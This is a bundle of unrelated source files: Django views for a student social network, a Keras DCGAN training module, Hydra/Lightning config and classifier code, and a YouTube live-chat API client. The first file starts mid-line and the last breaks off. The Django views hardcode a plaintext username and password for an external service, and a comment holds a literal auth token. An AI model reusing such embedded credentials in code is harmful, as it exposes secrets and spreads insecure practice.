request.user.id)) def reject_friend_request(request, User_id): if request.user.is_anonymous: return HttpResponseForbidden("Please sign in") actor_user_profile = get_object_or_404(User_Profile, user_id=User_id) object_user_profile = get_object_or_404(User_Profile, user=request.user) f_request = FriendRequest.objects.filter(actor=actor_user_profile, object=object_user_profile) if not f_request.exists(): #Checks if the friend request exists return HttpResponseBadRequest("Friend request does not exist") f_request.delete() print("{} deleted {}s' friend request".format( object_user_profile.displayName, actor_user_profile.displayName)) return HttpResponseRedirect('/authors/requests/view-request/{}/'.format( request.user.id)) def view_friend_requests(request, User_id): #Makes sure that only the author can see the requests if request.user.id != User_id: return HttpResponseForbidden("You are forbidden") user_profile = get_object_or_404(User_Profile, user_id=User_id) recieved_requests = FriendRequest.objects.filter(object=user_profile) sent_requests = FriendRequest.objects.filter(actor=user_profile) print(recieved_requests, sent_requests) return render(request, 'users/view_requests.html', { 'recieved_requests': recieved_requests, 'sent_requests': sent_requests }) def get_t15_authors(url): ext_request = requests.get( url, auth=('connectionsuperuser', '404connection'), headers={ 'Referer': "https://cmput404-socialdist-project.herokuapp.com/" }) ext_request = ext_request.json() return ext_request def view_t15_users(request): url = "https://unhindled.herokuapp.com/service/authors" authors = get_t15_authors(url) list_of_authors = [] for i in authors['items']: list_of_authors.append(i) return render(request, 'users/team15users.html', {'authors': list_of_authors}) def make_external_request(url, auth): ext_request = requests.get( url, auth=auth, headers={ 'Referer': "https://cmput404-socialdist-project.herokuapp.com/" }) ext_request = ext_request.json() return ext_request def view_t3_users(request): url = "https://social-dis.herokuapp.com/authors/" auth = ('socialdistribution_t03', '<PASSWORD>') ext_json = make_external_request(url, auth) print(ext_json['items']) return render(request, 'users/t03_users.html', {'authors': ext_json['items']}) def view_t3_posts(request): url = "https://social-dis.herokuapp.com/posts/" auth = ('socialdistribution_t03', '<PASSWORD>') ext_json = make_external_request(url, auth) #print(ext_json['items']) return render(request, 'users/t03_posts.html', {'post_list': ext_json['items']}) def view_followers(request, User_id): user = get_object_or_404(User, pk=User_id) user_profile = get_object_or_404(User_Profile, user=user) followers_list = UserFollows.objects.filter(object=user_profile) follows_list = UserFollows.objects.filter(actor=user_profile) is_user = (request.user.id == User_id) #friends_list = UserFollows.objects.filter(object_id=user_profile) for x in followers_list: print(x.actor.displayName) return render( request, 'users/view_followers.html', { 'followers_list': followers_list, 'user': user_profile, 'request': request, 'follows_list': follows_list }) # This function will make it so that User_id user will stop following # foreign_id user def unfollower_user(request, User_id, foreign_id): if request.user.id != User_id: return HttpResponseForbidden("Action is not allowed.") user_profile = fetch_user_profiles(User_id) foreign_profile = fetch_user_profiles(foreign_id) UserFollows.delete_user_follow(user_profile, foreign_profile) return HttpResponseRedirect(reverse( 'users:view_followers',args=[User_id])) def fetch_user_profiles(user_id): user = get_object_or_404(User, pk=user_id) return get_object_or_404(User_Profile, user=user) def send_request_page(request): user_profile = get_object_or_404(User_Profile, user_id=request.user.id) users_list = User_Profile.objects.filter(~Q(user=request.user)) print(users_list) return render(request, 'users/send_requests.html', {'users_list': users_list}) def get_user_page(request, User_id): user = get_object_or_404(User, pk=User_id) user_profile = get_object_or_404(User_Profile, user_id=User_id) return render(request, 'users/author_page_json.html', {'user_id': User_id}) @login_required def display_token(request): token = Token.objects.get(user=request.user).key return render(request, 'users/display_token.html', context={'user_token': token}) #curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a' #curl -X GET http://127.0.0.1:8000/authors/send_token -H 'Authorization: Username doge Password <PASSWORD>' @login_required def generate_token(request): user = request.user new_token = Token.objects.get(user=user) user.token = new_token user.save() return HttpResponseRedirect('user_home_page') #curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a' ```
{ "source": "2021-FIIT-Bc-projects/DCGAN-Docker", "score": 2 }
#### File: gan/src/dcgan_models.py ```python from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, \ Conv2D, \ ReLU, \ LeakyReLU, \ Dropout, \ Flatten, \ Reshape, \ Conv2DTranspose, \ BatchNormalization from tensorflow.keras.optimizers import Adam from tensorflow.keras import initializers, optimizers from os import stat, mkdir, path, listdir, remove import datetime # testing import numpy as np import math from matplotlib import pyplot as plt import random from PIL import Image from skimage.transform import resize import csv # for logging #dataset_path = "/content/ffhq-dataset/thumbnails128x128" #output_path = "/content/drive/My Drive/gan_files" class GAN: def __init__(self, generator, discriminator, height=64, width=64, model_name="dcgan_tanh_x64", output_path="", dataset_size=70000, inputs=None, lr=0.0002): self.dataset_size = dataset_size self.batch_size = None model_directory = path.join(output_path, model_name) try: stat(model_directory) except: mkdir(model_directory) mkdir(path.join(model_directory, "saves")) mkdir(path.join(model_directory, "outputs")) mkdir(path.join(model_directory, "outputs", "evaluation")) mkdir(path.join(model_directory, "anim")) self.height = height self.width = width self.model_name = model_name self.output_path = output_path discriminator.model.trainable = False self.model = Sequential() self.model.add(generator.model) self.model.add(discriminator.model) self.model.layers[0]._name = 'Generator' self.model.layers[1]._name = 'Discriminator' adam = Adam(learning_rate=lr, beta_1=0.5) self.model.compile(loss='binary_crossentropy', optimizer=adam) self.generator = generator self.discriminator = discriminator self.inputs = inputs; def eval_performance(self, losses, init_time, n_dim, i_epoch, n_epochs, i_batch, n_batches, inputs, n=100, n_plot=10, plot_size=9, disable_plot=False): # x_real, y_real = self.discriminator.generate_real_samples_random(n, 0, self.dataset_size) x_real, y_real = self.discriminator.generate_real_samples_random(n, type=self.discriminator.dataset_type) _, acc_real = self.discriminator.model.evaluate(x_real, y_real, verbose=0) input_points = random_latent_points(n_dim, n) x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, n) _, acc_fake = self.discriminator.model.evaluate(x_fake, y_fake, verbose=0) batch_id = i_epoch * n_batches + i_batch timestamp = datetime.datetime.now() eval_row = [batch_id, timestamp, losses[0], losses[1], losses[2], acc_real, acc_fake, ] with open(path.join(self.output_path, self.model_name, 'outputs', 'evaluation', 'metrics.csv'), 'a+') as metrics_file: writer = csv.writer(metrics_file, delimiter=',') writer.writerow(eval_row) print(f"[Batch {batch_id}:]\n" f"Time since start of session: {timestamp - init_time}\n" f"Discriminator real loss: {losses[0]}\n" f"Discriminator fake loss: {losses[1]}\n" f"Gan fitting loss: {losses[2]}\n" f"Real accuracy: {acc_real}\n" f"Fake accuracy: {acc_fake}\n" f"Metrics logged to csv file.") if i_batch % n_plot == 0: # n_factor = math.sqrt(n) fig = generate_and_plot(self.generator, n_dim, inputs, plot_size) epoch_padding_size = 8 # len(str(n_epochs-1)) batch_padding_size = 8 # len(str(n_batches-1)) filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(i_epoch).rjust(epoch_padding_size, '0')}_" \ f"{str(i_batch).rjust(batch_padding_size, '0')}.png") fig.savefig(filename) if disable_plot == False: plt.show(fig) plt.close(fig) def train_gan(self, dataset_size, n_dim=100, start_epoch=0, n_epochs=100, n_batch=128, n_eval=2000, eval_samples=100, n_plot=10, plot_size=9, type='face', disable_plot=False): # diskriminator updatujeme so vstupmi v pocte n_batch, pol. real, pol. fake self.batch_size = n_batch half_batch = n_batch // 2 batches = dataset_size // half_batch init_time = datetime.datetime.now() for epoch in range(start_epoch, n_epochs): start_n = 0 # pozicia v datasete pre epoch for i in range(batches): print(f"[Epoch {epoch}] Batch {i}/{batches}") # vstup a target pre diskriminator x_real, y_real = self.discriminator.generate_real_samples(start_n, half_batch, type=self.discriminator.dataset_type) input_points = random_latent_points(n_dim, half_batch) x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, half_batch) d_loss_real, _ = self.discriminator.model.train_on_batch(x_real, y_real) d_loss_fake, _ = self.discriminator.model.train_on_batch(x_fake, y_fake) # vstup a target pre generator x_gan = random_latent_points(n_dim, n_batch) y_gan = np.ones((n_batch, 1)) g_loss = self.model.train_on_batch(x_gan, y_gan) if i % n_eval == 0: losses = (d_loss_real, d_loss_fake, g_loss) if self.inputs.any() == None: inputs = random_latent_points(n_dim, plot_size) else: inputs = self.inputs self.eval_performance(losses, init_time, n_dim, epoch, n_epochs, i, batches, inputs, n=eval_samples, n_plot=n_plot, plot_size=plot_size, disable_plot=disable_plot) start_n += half_batch class Discriminator: def __init__(self, default_width, default_height, n_filters=128, pixel_depth=3, dataset_path='', dataset_type='face', lr=0.0002): # edit kernel size, layer sizes, bigger dropouts, default alpha on relu self.dataset_path = dataset_path self.dataset_type = dataset_type self.height = default_height self.width = default_width self.pixel_depth = pixel_depth self.model = Sequential() first_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d filters=n_filters, kernel_size=(5, 5), # ^^ strides=(2, 2), padding='same', input_shape=(self.height, self.width, pixel_depth) ) first_activation = LeakyReLU(alpha=0.2) first_dropout = Dropout(0.3) self.model.add(first_layer) self.model.add(first_activation) self.model.add(first_dropout) current_size = self.height // 2 while current_size > 4: new_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d filters=n_filters / 2, kernel_size=(5, 5), # ^^ strides=(2, 2), padding='same' ) new_activation = LeakyReLU(alpha=0.2) new_dropout = Dropout(0.3) self.model.add(new_layer) self.model.add(new_activation) self.model.add(new_dropout) current_size /= 2 flatten = Flatten() output_dense = Dense( units=1, # real/fake klasifikacia activation='sigmoid' ) self.model.add(flatten) self.model.add(output_dense) # model.summary() adam = Adam(learning_rate=lr, beta_1=0.5) self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy']) # metrics kvoli evaluation def generate_real_face_samples(self, i_start, n): picked_sample_list = list() for i_image in range(i_start, i_start + n): chosen_sample = i_image chosen_folder = chosen_sample - (chosen_sample % 1000) folder_string = str(chosen_folder) image_string = str(chosen_sample) folder_string = folder_string.rjust(5, '0') # padding image_string = image_string.rjust(5, '0') # padding full_path = path.join(self.dataset_path, folder_string, image_string + '.png') with Image.open(full_path) as image: image_array = np.array(image) image_array = resize(image_array, (self.height, self.width)) picked_sample_list.append(image_array) # after loading n samples: X = np.array(picked_sample_list) y = np.ones((n, 1)) return X, y def generate_real_samples(self, i_start, n, type='face'): loader = None if type == 'face': loader = self.generate_real_face_samples else: print("Unknown dataset.") return None return loader(i_start, n) def generate_real_face_random(self, n, i_min=0, i_max=70000): picked_sample_list = list() for i_image in range(n): chosen_sample = random.choice(range(i_min, i_max)) chosen_folder = chosen_sample - (chosen_sample % 1000) folder_string = str(chosen_folder) image_string = str(chosen_sample) folder_string = folder_string.rjust(5, '0') # padding image_string = image_string.rjust(5, '0') # padding full_path = path.join(self.dataset_path, folder_string, image_string + '.png') with Image.open(full_path) as image: image_array = np.array(image) image_array = resize(image_array, (self.height, self.width)) picked_sample_list.append(image_array) X = np.array(picked_sample_list) y = np.ones((n, 1)) return X, y def generate_real_samples_random(self, n, i_min=0, i_max=70000, type='face'): loader = None if type == 'face': loader = self.generate_real_face_random else: print("Unknown dataset.") return None return loader(n) class Generator: def __init__(self, default_height, default_width, n_dim=100, n_paralell_samples=64, pixel_depth=3, init_size=8): #changes: # leakyrelu to default alpha, use_bias=False, added batch norms, kernel size to 5, add initial conv2dtransp # dense size 128 -> 256, first conv 128, then all 64 self.height = default_height self.width = default_width self.model = Sequential() first_layer = Dense( units=init_size * init_size * 256, input_dim=n_dim, # use_bias=False, # activation='linear' ) # first_norm = BatchNormalization() first_activation = LeakyReLU() reshape = Reshape((init_size, init_size, 256)) #init_conv = Conv2DTranspose( # alternativne UpSample2D + Conv2D, zvacsenie a domyslenie, toto ich spaja do 1 # filters=n_paralell_samples, # kernel_size=(5, 5), # strides=(1, 1), # padding='same', # use_bias=False #) # init_norm = BatchNormalization() #init_activation = LeakyReLU() self.model.add(first_layer) # self.model.add(first_norm) self.model.add(first_activation) self.model.add(reshape) #self.model.add(init_conv) # self.model.add(init_norm) #self.model.add(init_activation) current_size = init_size while current_size < self.height: new_layer = Conv2DTranspose( # alternativne UpSample2D + Conv2D, zvacsenie a domyslenie, toto ich spaja do 1 filters=n_paralell_samples, kernel_size=(4, 4), strides=(2, 2), padding='same', # use_bias=False ) # new_norm = BatchNormalization() new_activation = LeakyReLU() self.model.add(new_layer) # self.model.add(new_norm) self.model.add(new_activation) current_size *= 2 output_layer = Conv2D( filters=pixel_depth, # rgb info kernel_size=(3, 3), activation='tanh', # specialna akt. funk. pre rgb padding='same', # use_bias=False ) self.model.add(output_layer) def generate_fake_samples(self, x_input, n_dim, n): # [-1,1] X = self.model.predict(x_input) y = np.zeros((n, 1)) return X, y def rgb_to_float(rgb_value): zero_to_one = rgb_value / 256.0 # normalized = (zero_to_one - 0.5) * 2 return zero_to_one def float_to_rgb(float_value): # converted_float = (float_value / 2) + 0.5 rgb_value = (float_value * 256) rgb_value = np.where(rgb_value > 255, 255, rgb_value) rgb_value = np.where(rgb_value < 0, 0, rgb_value).astype('uint8') return rgb_value def random_latent_points(n_dim, n): latent_vectors = np.random.randn(n_dim * n) # n čísel z gauss. distrib. latent_vectors = latent_vectors.reshape(n, n_dim) return latent_vectors def generate_and_plot(generator, n_dim, inputs, n): n_factor = int(math.sqrt(n)) x_plt, _ = generator.generate_fake_samples(inputs, n_dim, n) px = 1 / plt.rcParams['figure.dpi'] fig = plt.figure(frameon=False, figsize=((n_factor * generator.width) * px, (n_factor * generator.height) * px)) for i in range(n_factor * n_factor): # ZMEN ABY NAMIESTO 4,5 BOLI FACTORS # define subplot ax = fig.add_subplot(n_factor, n_factor, 1 + i) ax.axis('off') ax.imshow(float_to_rgb(x_plt)[i], interpolation='nearest') plt.tight_layout() fig.subplots_adjust(wspace=0, hspace=0, left=0, right=1, top=1, bottom=0) return fig def latent_transition(pointA, pointB, n_dim=100, n_steps=100): transition_points = np.empty([n_steps, n_dim]) for i in range(n_steps): step = (-math.cos(i / n_steps * math.pi) * 0.5 + 0.5) # input value (t) for interp for dim in range(n_dim): transition_points[i][dim] = (pointB[dim] - pointA[dim]) * step + pointA[dim] # cosine interpolation return transition_points class Encoder: def __init__(self, default_width, default_height, n_filters=64, pixel_depth=3, dataset_path='', dataset_type='face'): self.dataset_path = dataset_path self.dataset_type = dataset_type self.height = default_height self.width = default_width self.model = Sequential() first_layer = Conv2D( filters=n_filters, kernel_size=(4, 4), strides=(2, 2), padding='same', input_shape=(self.height, self.width, pixel_depth), activation='relu', ) self.model.add(first_layer) current_size = self.height // 2 while current_size > 4: new_layer = Conv2D( # vstupne np polia su sice 3d, ale convolution sa nad nimi robi 2d filters=n_filters, kernel_size=(4, 4), # ^^ strides=(2, 2), padding='same', activation='relu', ) self.model.add(new_layer) current_size /= 2 final_layer = Conv2D( filters=256, kernel_size=(4, 4), strides=(1, 1), padding='same', input_shape=(self.height, self.width, pixel_depth), activation='relu', ) self.model.add(final_layer) flatten = Flatten() output_dense = Dense( units=100, # result vector activation='tanh', ) self.model.add(flatten) self.model.add(output_dense) def generate_real_face_samples(self, i_start, n, dataset_path="dataset_download/thumbnails128x128"): picked_sample_list = list() for i_image in range(i_start, i_start + n): chosen_sample = i_image chosen_folder = chosen_sample - (chosen_sample % 1000) folder_string = str(chosen_folder) image_string = str(chosen_sample) folder_string = folder_string.rjust(5, '0') # padding image_string = image_string.rjust(5, '0') # padding full_path = path.join(self.dataset_path, folder_string, image_string + '.png') with Image.open(full_path) as image: image_array = np.array(image) image_array = resize(image_array, (self.height, self.width)) picked_sample_list.append(image_array) # after loading n samples: X = np.array(picked_sample_list) y = np.ones((n, 1)) return X, y class FMAE: def __init__(self, encoder, generator, height, width, lr=0.001): self.height = height self.width = width generator.model.trainable = False self.model = Sequential() self.model.add(encoder.model) self.model.add(generator.model) self.model.layers[0]._name = 'Encoder' self.model.layers[1]._name = 'Generator' adam = Adam(learning_rate=lr, beta_1=0.5) self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics='accuracy') self.encoder = encoder self.generator = generator def train_fmae(self, input_image, n_steps): init_time = datetime.datetime.now() for epoch in range(0, n_steps): if epoch % 100 == 0: print("Epoch", epoch) decoded_image = self.model.predict(input_image) fig = plt.imshow(decoded_image[0], interpolation='nearest') plt.show(fig) plt.close() self.model.fit(input_image, input_image, verbose=0) def train_fmae_on_dataset(self, input_image, n_epochs, dataset_size=70000, batch_size=100, n_eval=100, plot_size=10, disable_plot=False): init_time = datetime.datetime.now() n_batches = dataset_size // batch_size for epoch in range(0, n_epochs): start_n = 0 print("Epoch", epoch) for batch in range(0, n_batches): samples, _ = self.encoder.generate_real_face_samples(start_n, batch_size, dataset_path="dataset_download/thumbnails128x128") #inputs = random_latent_points(100, batch_size) #samples_, _ = self.generator.generate_fake_samples(inputs, 100, batch_size) self.model.fit(samples, samples, verbose=0) if batch % n_eval == 0: print("Batch", batch) # filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(epoch).rjust(5, '0')}_" \ # f"{str(batch).rjust(5, '0')}.png") real_image, _ = self.encoder.generate_real_face_samples(start_n, 1, dataset_path="dataset_download/thumbnails128x128") decoded_real_image = self.model.predict(real_image) decoded_input_image = self.model.predict(input_image) fig = plt.imshow(decoded_real_image[0], interpolation='nearest') if disable_plot == False: plt.show(fig) plt.close() fig = plt.imshow(decoded_input_image[0], interpolation='nearest') if disable_plot == False: plt.show(fig) plt.close() start_n += batch_size ```
{ "source": "2021L-ZZSN/template", "score": 2 }
#### File: zzsn2021/configs/register.py ```python from __future__ import annotations from dataclasses import dataclass, field from typing import Any, Dict, Iterator, List, Optional, cast import omegaconf from hydra.conf import HydraConf, RunDir, SweepDir from hydra.core.config_store import ConfigStore from omegaconf import SI, DictConfig from omegaconf.dictconfig import DictConfig from omegaconf.omegaconf import MISSING # isort: split from .experiment import ExperimentSettings from .lightning import LightningSettings from .optim import OPTIMIZERS, SCHEDULERS, OptimSettings @dataclass class Hydra(HydraConf): run: RunDir = RunDir("${output_dir}") sweep: SweepDir = SweepDir(".", "${output_dir}") @dataclass class Config(): """ Top-level Hydra config class. """ defaults: List[Any] = field(default_factory=lambda: [ {'experiment': 'fashion'}, {'optim': 'adam'}, {'override hydra/job_logging': 'rich'}, {'override hydra/hydra_logging': 'rich'}, ]) # Path settings data_dir: str = SI("${oc.env:DATA_DIR}") output_dir: str = SI("${oc.env:RUN_DIR}") # Runtime configuration hydra: Hydra = Hydra() pl: LightningSettings = LightningSettings() # Experiment settings --> experiment/*.yaml experiment: ExperimentSettings = MISSING # Optimizer & scheduler settings --> optim/*.yaml optim: OptimSettings = MISSING # wandb metadata notes: Optional[str] = None tags: Optional[List[str]] = None def register_configs(): """ Register configuration options in the main ConfigStore.instance(). The term `config` is used for a StructuredConfig at the root level (normally switchable with `-cn` flag in Hydra, here we use only one default config). Fields of the main config use StructuredConfigs with class names ending in `Settings`. `Conf` suffix is used for external schemas provided by the `hydra-torch` package for PyTorch/PyTorch Lightning integration, e.g. `AdamConf`. """ cs = ConfigStore.instance() # Main config cs.store(name='default', node=DictConfig(Config())) # Config groups with defaults, YAML files validated by Python structured configs # e.g.: `python -m zzsn2021.main experiment=fashion` cs.store(group='experiment', name='schema_experiment', node=ExperimentSettings) cs.store(group='optim', name='schema_optim', node=OptimSettings) # Specific schemas, YAML files should inherit them as a default, e.g: # defaults: # - schema_optim # - schema_optim_adam for key, node in OPTIMIZERS.items(): name = f'schema_optim_{key}' cs.store(group='optim', name=name, node=node, package='optim.optimizer') for key, node in SCHEDULERS.items(): name = f'schema_optim_lrscheduler_{key}' cs.store(group='optim', name=name, node=node, package='optim.scheduler') def _get_tags(cfg: dict[str, Any]) -> Iterator[str]: for key, value in cfg.items(): if isinstance(value, dict): yield from _get_tags(cast(Dict[str, Any], value)) if key == '_tags_': if isinstance(value, list): for v in cast(List[str], value): yield v else: if value is not None: value = cast(str, value) yield value def get_tags(cfg: DictConfig): """ Extract all tags from a nested DictConfig object. """ cfg_dict = cast(Dict[str, Any], omegaconf.OmegaConf.to_container(cfg, resolve=True)) if 'tags' in cfg_dict: cfg_dict['_tags_'] = cfg_dict['tags'] return list(_get_tags(cfg_dict)) ``` #### File: zzsn2021/systems/classifier.py ```python from __future__ import annotations import random from typing import Any, Tuple, Union import numpy as np import pytorch_lightning as pl import torch import torch.nn as nn import torch.nn.functional as F from hydra.utils import instantiate from pytorch_lightning.loggers.base import LoggerCollection from pytorch_lightning.loggers.wandb import WandbLogger from pytorch_lightning.metrics import Accuracy from rich import print from torch.optim.lr_scheduler import _LRScheduler from torch.optim.optimizer import Optimizer from wandb.sdk.wandb_run import Run from ..configs import Config from ..models import ConvNet class ImageClassifier(pl.LightningModule): """ Basic image classifier. """ def __init__(self, cfg: Config) -> None: super().__init__() # type: ignore self.logger: Union[LoggerCollection, WandbLogger, Any] self.wandb: Run self.cfg = cfg self.model = ConvNet(self.cfg) self.criterion = nn.CrossEntropyLoss() # Metrics self.train_acc = Accuracy() self.val_acc = Accuracy() # ----------------------------------------------------------------------------------------------- # Default PyTorch Lightning hooks # ----------------------------------------------------------------------------------------------- def on_fit_start(self) -> None: """ Hook before `trainer.fit()`. Attaches current wandb run to `self.wandb`. """ if isinstance(self.logger, LoggerCollection): for logger in self.logger: # type: ignore if isinstance(logger, WandbLogger): self.wandb = logger.experiment # type: ignore elif isinstance(self.logger, WandbLogger): self.wandb = self.logger.experiment # type: ignore def on_save_checkpoint(self, checkpoint: dict[str, Any]) -> None: """ Hook on checkpoint saving. Adds config and RNG states to the checkpoint file. """ checkpoint['cfg'] = self.cfg checkpoint['rng_torch'] = torch.default_generator.get_state() checkpoint['rng_numpy'] = np.random.get_state() checkpoint['rng_random'] = random.getstate() def on_load_checkpoint(self, checkpoint: dict[str, Any]) -> None: """ Hook on checkpoint loading. Loads RNG states from the checkpoint file. """ torch.default_generator.set_state(checkpoint['rng_torch']) np.random.set_state(checkpoint['rng_numpy']) random.setstate(checkpoint['rng_random']) # ---------------------------------------------------------------------------------------------- # Optimizers # ---------------------------------------------------------------------------------------------- def configure_optimizers(self) -> Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]]: # type: ignore """ Define system optimization procedure. See https://pytorch-lightning.readthedocs.io/en/latest/common/lightning_module.html#configure-optimizers. Returns ------- Union[Optimizer, Tuple[List[Optimizer], List[_LRScheduler]]] Single optimizer or a combination of optimizers with learning rate schedulers. """ optimizer: Optimizer = instantiate( self.cfg.optim.optimizer, params=self.parameters(), _convert_='all' ) if self.cfg.optim.scheduler is not None: scheduler: _LRScheduler = instantiate( # type: ignore self.cfg.optim.scheduler, optimizer=optimizer, _convert_='all' ) print(optimizer, scheduler) return [optimizer], [scheduler] else: print(optimizer) return optimizer # ---------------------------------------------------------------------------------------------- # Forward # ---------------------------------------------------------------------------------------------- def forward(self, x: torch.Tensor) -> torch.Tensor: # type: ignore """ Forward pass of the whole system. In this simple case just calls the main model. Parameters ---------- x : torch.Tensor Input tensor. Returns ------- torch.Tensor Output tensor. """ return self.model(x) # ---------------------------------------------------------------------------------------------- # Loss # ---------------------------------------------------------------------------------------------- def calculate_loss(self, outputs: torch.Tensor, targets: torch.Tensor) -> torch.Tensor: """ Compute loss value of a batch. In this simple case just forwards computation to default `self.criterion`. Parameters ---------- outputs : torch.Tensor Network outputs with shape (batch_size, n_classes). targets : torch.Tensor Targets (ground-truth labels) with shape (batch_size). Returns ------- torch.Tensor Loss value. """ return self.criterion(outputs, targets) # ---------------------------------------------------------------------------------------------- # Training # ---------------------------------------------------------------------------------------------- def training_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, torch.Tensor]: # type: ignore """ Train on a single batch with loss defined by `self.criterion`. Parameters ---------- batch : list[torch.Tensor] Training batch. batch_idx : int Batch index. Returns ------- dict[str, torch.Tensor] Metric values for a given batch. """ inputs, targets = batch outputs = self(inputs) # basically equivalent to self.forward(data) loss = self.calculate_loss(outputs, targets) self.train_acc(F.softmax(outputs, dim=1), targets) return { 'loss': loss, # no need to return 'train_acc' here since it is always available as `self.train_acc` } def training_epoch_end(self, outputs: list[Any]) -> None: """ Log training metrics. Parameters ---------- outputs : list[Any] List of dictionaries returned by `self.training_step` with batch metrics. """ step = self.current_epoch + 1 metrics = { 'epoch': float(step), 'train_acc': float(self.train_acc.compute().item()), } # Average additional metrics over all batches for key in outputs[0]: metrics[key] = float(self._reduce(outputs, key).item()) self.logger.log_metrics(metrics, step=step) def _reduce(self, outputs: list[Any], key: str): return torch.stack([out[key] for out in outputs]).mean().detach() # ---------------------------------------------------------------------------------------------- # Validation # ---------------------------------------------------------------------------------------------- def validation_step(self, batch: list[torch.Tensor], batch_idx: int) -> dict[str, Any]: # type: ignore """ Compute validation metrics. Parameters ---------- batch : list[torch.Tensor] Validation batch. batch_idx : int Batch index. Returns ------- dict[str, torch.Tensor] Metric values for a given batch. """ inputs, targets = batch outputs = self(inputs) # basically equivalent to self.forward(data) self.val_acc(F.softmax(outputs, dim=1), targets) return { # 'additional_metric': ... # no need to return 'val_acc' here since it is always available as `self.val_acc` } def validation_epoch_end(self, outputs: list[Any]) -> None: """ Log validation metrics. Parameters ---------- outputs : list[Any] List of dictionaries returned by `self.validation_step` with batch metrics. """ step = self.current_epoch + 1 if not self.trainer.running_sanity_check else self.current_epoch # type: ignore metrics = { 'epoch': float(step), 'val_acc': float(self.val_acc.compute().item()), } # Average additional metrics over all batches for key in outputs[0]: metrics[key] = float(self._reduce(outputs, key).item()) self.logger.log_metrics(metrics, step=step) ```
{ "source": "2021myj-j/share-game", "score": 3 }
#### File: share_game/core/confing.py ```python import yaml import os from core.utils import find_files class ReadConfing(): def __init__(self, path: str) -> None: self.data = yaml.load(open(path, "r", encoding="UTF-8"), Loader=yaml.FullLoader) def getconfing(self, ver_name: str): return self.data[ver_name] def find_confing_path(confing_paths: list): if confing_paths: if len(confing_paths) > 1: for i in confing_paths: if "share" in i and "game" in i: return i else: return confing_paths[0] confing_paths = find_files(os.path.abspath(".."), "confing.yaml") if not confing_paths: confing_paths = find_files(os.path.abspath(".."), "key.yaml") confing_path = find_confing_path(confing_paths) if not confing_path: class MissingKeyOrConfingError(Exception): def __str__(self) -> str: return "Missing key file or confing file" raise MissingKeyOrConfingError readConfing = ReadConfing(confing_path) YOTUBER_URL = readConfing.getconfing("YOTUBER_URL") YOTUBER_API_KEY = readConfing.getconfing("YOTUBER_API_KEY") if __name__ == "__main__": print(confing_path) print(YOTUBER_URL) print(YOTUBER_API_KEY) # 旧find_confing_path()関数 """ def find_confing_path(): import os def fing_confing(listdir, path: str): if "confing.yaml" in listdir: return os.path.join(path, "confing.yaml") elif "key.yaml" in listdir: return os.path.join(path, "key.yaml") listdir = os.listdir(".") abspath: str = os.path.abspath(".") confing_path = None if "share_game" in listdir: listdir_share_game = os.listdir("share_game") confing_path = fing_confing( listdir_share_game, os.path.join(abspath, "share_game") ) elif "share-game" in listdir: listdir_share_game = os.listdir("share-game") confing_path = fing_confing( listdir_share_game, os.path.join(abspath, "share-game") ) if not confing_path: confing_path = fing_confing(listdir, abspath) if confing_path: return confing_path else: class MissingKeyOrConfingError(Exception): def __str__(self) -> str: return "Missing key file or confing file" raise MissingKeyOrConfingError """ ``` #### File: share_game/core/youtube_api.py ```python import requests import datetime class YoutubeLiveChat(): def __init__(self, youtuber_url, youtuber_api_key, interval=10) -> None: """ Unit of interval: second """ self.youtuber_api_key = youtuber_api_key self.chat_id = self.get_chat_id(youtuber_url) if not self.chat_id: class NoneError(Exception): def __str__(self) -> str: return "This value can NOT be None!" raise NoneError self.interval = interval self.previous_token_time = datetime.datetime.now() - datetime.timedelta(seconds=self.interval + 1) # yapf: disable self.page_token = self.get_chat_message_next_page_token() def get_chat_id(self, yt_url: str): ''' from qiita @iroiro_bot https://qiita.com/iroiro_bot/items/ad0f3901a2336fe48e8f https://developers.google.com/youtube/v3/docs/videos/list?hl=ja ''' video_id = yt_url.replace('https://www.youtube.com/watch?v=', '') print('video_id : ', video_id) url = 'https://www.googleapis.com/youtube/v3/videos' params = { 'key': self.youtuber_api_key, 'id': video_id, 'part': 'liveStreamingDetails' } data = requests.get(url, params=params).json() try: liveStreamingDetails = data['items'][0]['liveStreamingDetails'] except BaseException: print('NO live') return None if 'activeLiveChatId' in liveStreamingDetails.keys(): chat_id = liveStreamingDetails['activeLiveChatId'] print('get_chat_id done!') else: chat_id = None print('NOT live') return chat_id def get_chat_message_row_data(self, page_token=None, part='id,snippet,authorDetails'): # inputの方がサガサイでやりやすそう interval = datetime.datetime.now() - self.previous_token_time if interval.seconds < self.interval: return None # print(self.interval) url = 'https://www.googleapis.com/youtube/v3/liveChat/messages' params = { 'key': self.youtuber_api_key, 'liveChatId': self.chat_id, 'part': 'id,snippet,authorDetails', } if page_token: params['pageToken'] = page_token self.previous_token_time = datetime.datetime.now() res = requests.get(url, params=params).json() # print(res) if "error" in res: return None return res def get_chat_message_next_page_token(self): chat_message_row_data = self.get_chat_message_row_data() if not chat_message_row_data: return None return chat_message_row_data["nextPageToken"] def format_chat_message_row_data(self, data): if not data: return None comments = [] try: for item in data['items']: channelId = item['snippet']['authorChannelId'] msg = item['snippet']['displayMessage'] published_at = item['snippet']["publishedAt"] usr = item['authorDetails']['displayName'] # 要求されたもの comment = { "author_channel_id": channelId, "author_name": usr, "display_message": msg, "published_at": published_at } comments.append(comment) except BaseException: return None res = {"next_page_token": data['nextPageToken'], "comments": comments} return res # yapf: disable def get_formatted_chat_message_data(self, page_token=None, part='id,snippet,authorDetails'): chat_message_row_data = self.get_chat_message_row_data(page_token=page_token, part=part) formatted_chat_message_data = self.format_chat_message_row_data(chat_message_row_data) return formatted_chat_message_data # yapf: enable def get_next_chat_message(self, part='id,snippet,authorDetails'): if not self.page_token: self.page_token = self.get_chat_message_next_page_token() next_chat_message = 